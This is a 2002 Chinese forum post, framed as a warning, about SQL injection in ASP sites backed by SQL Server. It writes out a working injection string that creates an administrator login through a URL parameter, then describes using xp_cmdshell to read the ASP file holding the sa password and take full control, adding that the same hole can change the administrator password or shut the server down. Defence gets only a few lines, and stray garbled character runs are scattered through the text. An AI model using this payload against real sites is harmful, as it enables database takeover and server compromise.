查看: 9014|回复: 0

ASP程序+数据库安全一例

[复制链接]
发表于 2002-2-10 17:14:05 | 显示全部楼层 |阅读模式
为了考证这种类型的程序BUG,笔者最近去了很多用ASP和SQL SERVER做的网站,发现绝大部分网站的程序有这个BUG,于是觉得有必要把这个问题贴出,以免大家犯同样的错误。
2 c& q3 L" w% T& i+ ?% X7 \$ q! X3 F  BUG描述:, p' }3 h/ z: L9 e
  把一个有参数的xxx.asp?x=x程序变成xxx.asp?x=x;use pubs;exec sp_addlogin 'admin','admin','master';exec sp_adduser 'admin','admin','db_ower';--: D' h) [& |) [
  BUG讲解:/ y! e& L6 c* q; M1 X
  这个BUG是利用参数未过滤来执行SQL语句增加一个用户,然后可以用此用户连上SQL SERVER,再通过exec xp_cmdshell 'type x.asp'来查看存有sa密码的ASP文件来获得SQL SERVER的最高权限。  {4 k6 d4 \1 R! R
  BUG消除:
% [- a3 A1 A, J  @7 q" ]  程序增加参数过滤& I6 \' y* k. P; _+ q, I
  附:sp_addlogin和sp_adduser语法
; o* x9 T$ \+ O& k; T0 V8 }$ esp_addlogin [@loginame =] 'login'* r% N" `6 i# Z) h3 N# }
  [,][@passwd =] 'password']6 l2 o0 b+ z, a$ \. ]
  [,][@defdb =] 'database']
% ]: Y  {4 x( M& `* x" F  [,][@deflanguage =] 'language']' a4 u0 W! N8 T% m
  [,[@sid =] 'sid']
, \' Z+ k5 r; m, J1 ^  [,][@encryptopt =] 'encryption_option']
! s5 u$ |& ]: S! ]7 j- N: hsp_adduser [@loginame =] 'login'# {6 w# b9 z2 _/ A" \8 m1 k; R
  [,][@name_in_db =] 'user']
7 e3 K) a# a/ ?- y- j- k  [,][@grpname =] 'group']5 m7 n! K' m- @  D# y
  注:如果采取SQL SERVER设为本地连接、改变端品号、drop xp_cmdshell等等可以防止很多攻击行为呀 ^_^! G. l6 ?4 [2 Q3 f
嘿嘿,这个BUG还可以用来改administrator的密码,让服务器关机等等
& p8 P" {2 {9 M4 w
您需要登录后才可以回帖 登录 | 注册

本版积分规则

关闭

站长推荐上一条 /1 下一条

相关侵权、举报、投诉及建议等,请发 E-mail:yesdong@qq.com

Powered by Discuz! X5.0 Licensed © 2001-2026 Discuz! Team.44152102000001

在本版发帖QQ客服返回顶部